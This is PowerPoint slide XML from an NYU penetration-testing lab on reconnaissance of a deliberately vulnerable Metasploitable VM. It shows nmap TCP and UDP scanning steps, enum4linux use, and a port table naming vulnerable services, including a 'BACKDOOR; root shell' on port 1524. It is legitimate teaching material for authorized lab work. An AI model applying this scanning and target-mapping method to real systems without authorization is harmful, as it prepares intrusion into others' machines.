        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:29:35.345" v="683" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3344639654" sldId="406"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:29:21.845" v="680"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3344639654" sldId="406"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:29:35.345" v="683" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3344639654" sldId="406"/>
            <ac:picMk id="4" creationId="{424BF7AB-612B-40F6-A498-5BF0F3846473}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del replId">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:27:31.389" v="664"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3402974647" sldId="406"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:34:54.510" v="699" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3140447" sldId="407"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:29:56.439" v="688"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3140447" sldId="407"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:34:54.510" v="699" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3140447" sldId="407"/>
            <ac:picMk id="2" creationId="{DAA43A09-F80D-471C-97B7-D63E0EA1D1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CED4BC-E14F-4E76-84D2-36F8E4044F81}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2/27/2021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C938DA-85C2-4C89-A7BC-698C09AFC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7328F3B-557D-4969-84A3-94972E2DF744}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2/27/2021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2C1CBC5-806E-4CCD-AAD1-C019813B1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x.stackexchange.com/questions/562550/smbclient-protocol-negotiation-failed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443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813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441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58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72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159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enum4Linux comes with Kali but we installed enum4linux-ng. From previous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> scanning, we know samba server is running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>. If we try using enum4linux, it returned nothing at first. Then I tried to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> in kali to connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Metasplotable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, it returned Error: “protocol negotiation failed: NT_STATUS_NOT_SUPPORTED”. The error would be fixed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://unix.stackexchange.com/questions/562550/smbclient-protocol-negotiation-failed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>. Then running enum4linux, we got results.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Alternatively, we can use enum4linux-ng which supports SMBv1 and has other benefits.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375493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6305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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr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227012" y="3919554"/>
            <a:ext cx="2496453" cy="18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Google Shape;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30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390053" y="75674"/>
            <a:ext cx="6527400" cy="586477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1ECE0-A6F8-46C7-8A4A-67CD6EF829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81" y="921704"/>
            <a:ext cx="8572840" cy="395509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457200" indent="-4572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000" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="688975" indent="-231775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2pPr>
            <a:lvl3pPr marL="1030288" indent="-225425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1371600" indent="-225425">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="914400" indent="-225425" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:tabLst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367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Content">
  <p:cSld name="Section Title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31775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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5516189" y="4905375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©2021 NYU Tandon School of Engineering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;29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8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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr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35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 descr="nyu_whit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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3271146" y="4908239"/>
            <a:ext cx="2601707" cy="2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©2021 NYU Tandon School of Engineering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58937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able.com/products/nessus-hom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cvedetails.com/cve/cve-1999-065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orums.unrealircd.org/viewtopic.php?t=65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metasploitable/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zi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cddmp/enum4linux-ng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7752" y="1765349"/>
            <a:ext cx="3637261" cy="181128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1700">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NYU Cyber Fellows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altLang="en-US" sz="1700">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>CS GY 6573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1500"/>
              <a:t>Penetration Testing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altLang="en-US">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="227013" indent="3175">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Exploitation Lab 1 - Foundation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>©2021 NYU Tandon School of Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51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338263"/>
            <a:ext cx="14652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A5519-2BF4-4408-BF65-13275DDF1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Recon</a:t>
            </a:r>
          </a:p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11033" y="1264195"/>
          <a:ext cx="482672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910">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2271251328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22332725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4340000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212755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666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kali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Linux 5.4.X</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US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10.10.0.10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Attacker - Kali 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53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/>
                        <a:t>metasploitable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Running: Linux 3.X|4.X</a:t>
                      </a:r>
                    </a:p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10.10.0.20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Target - Metasploitable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681452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FF969B99-1023-42C8-A4FC-64AFDD893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03" r="9738"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036028" y="791006"/>
            <a:ext cx="3668924" cy="793073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C5281AC-C978-4A53-9436-68A677F47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" b="-278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038004" y="1677600"/>
            <a:ext cx="3665220" cy="3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Recon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Do a full scan of Metasploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make sure it includes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Version Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Script Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>All TCP Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Do another scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UDP scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Only do the top 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Linux sends ICMP unreachable at one per second</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No need to take that long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Include version scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Start to make a chart of ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can copy and paste right into Excel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use the Data-&gt;Text to Columns and set to fixed width</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You could also use nmap output as xml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21" y="1753213"/>
            <a:ext cx="3197679" cy="878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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8239736" y="1450168"/>
            <a:ext cx="431074" cy="5596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4C3C52-4D53-4E49-99A3-BB4A6410E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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113225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2D302-8737-448D-8CF0-04DDC0CFDA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UDP Recon</a:t>
            </a:r>
          </a:p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24BF7AB-612B-40F6-A498-5BF0F384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85" y="1370388"/>
            <a:ext cx="6181555" cy="31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28AFB-B68D-4260-8063-4B433D85B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TCP Recon</a:t>
            </a:r>
          </a:p>
          <a:p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AA43A09-F80D-471C-97B7-D63E0EA1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74" y="814330"/>
            <a:ext cx="5853220" cy="40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127D1-D359-486A-A1C1-0EA464C17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Full Scan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1C884F-0492-465E-ADA4-CA6DD8CEFC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Next, we will do a full scan to identify all open TCP ports of metasploitable Bank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can either use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Automated Vulnerability Scanner </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If you completed the optional lab included with module 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nmap </a:t>
            </a:r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800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Note: The screenshots may not entirely match your results. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177530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Nmap to map all open ports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Let's do one final and complete scan using nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We want to know all open ports and their versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We want output that is usable with a spreadsheet application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Or at least better than default output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>As be begin to research each potential attack/entry point, we will need to take notes of services, versions, and steps we took</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Perform a full TCP scan, aggressive timing, with versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Include xml output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70E995-570B-4962-9BD8-B6E6F0013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A5FE60-9193-46FF-99D6-A0B70C0D80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3984CD-A1B8-4D96-9A45-6CA49DD44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714"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="516682" y="856311"/>
          <a:ext cx="7886695" cy="401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693">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2345083583"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="544693">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="610938191"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="544693">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3502745372"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="771648">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="23173469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70132715"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="766482">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1346462441"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1483496">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2090727736"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2087990">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1262893462"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="16340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State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Service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Version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Extra info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710864752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ftp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vsftpd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2.3.4 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1758726163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ssh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OpenSSH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4.7p1 Debian 8ubuntu1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protocol 2.0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151757206"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="806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telnet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43965044"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8068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25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tcp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open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smtp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syn-ack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Postfix smtpd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1152664940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domain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ISC BIND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9.4.2 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841765514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http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Apache httpd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2.2.8 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(Ubuntu) DAV/2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2298299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rpcbind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2 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RPC #100000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010569814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netbios-ssn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Samba </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>smbd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3.X - 4.X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workgroup: WORKGROUP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699382024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netbios-ssn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Samba </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>smbd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3.X - 4.X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workgroup: WORKGROUP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79139749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exec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883411028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login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397929276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shell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271676962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1337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waste?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syn-ack</a:t>
                      </a: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marL="0" algn="r" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1"/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61995131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1524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shell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Bash shell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**BACKDOOR**; root shell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4091305220"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="806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tcp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irc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syn-ack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UnrealIRCd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1923926509"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="80682">
                <a:tc gridSpan="8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...</a:t>
                      </a:r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3478257394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udp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domain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r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-response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85131103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rpcbind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r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-response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215732813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netbios</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-ns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r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-response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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1546051684"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1634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2049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endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" err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nfs</a:t>
                      </a:r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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>udp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-response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09" marR="6809" marT="6809" marB="0" anchor="b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2251581089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1567DF-1CED-4F5A-8B5E-618BF3FFFE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2390053" y="19450"/>
            <a:ext cx="6527400" cy="58647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-342900" algn="r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defRPr sz="2000" b="1" kern="1200" baseline="0"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None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Open Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61865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4AECE-694B-47A9-BF2B-A475AD7568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using nmap xml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C1AE9-F0F9-4A39-9033-85E7E4A63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>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>xml is a powerful format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Several options for viewing, one example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>xsltproc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>metasploitable_alltcp_v.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -o metasploitable_ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>alltcp_v.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" err="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> metasploitable_ alltcp_v.html </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 6" descr="手机屏幕截图&#10;&#10;已生成高可信度的说明">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A928F03F-C2B4-4870-A9B3-9E0EDE97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2053703"/>
            <a:ext cx="4350123" cy="2823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69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7013" indent="3175"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using an </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227013" indent="3175"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Automated Vulnerability Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="227013" indent="3175"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="1"/>
              <a:t>optional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b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100989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Limitation of Liability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During this lab, we will be scanning and attacking targets we own and have authorization to scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Making a mistake can cause untended harm or damage to other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>By participating in this lab and scanning targets, you are agreeing that you are scanning at your own risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>You will only scan authorized targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>NYU will not be liable for any damage you cause do to negligence or mistakes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3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Automated Vulnerability Scanner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We can also use Nessus or OpenVAS to get information about our target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is OPTIONAL since you must either</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nessus - register to get an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>activation code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.tenable.com/products/nessus-home</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OpenVAS - Install large package, increase RAM to Kali (4GB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
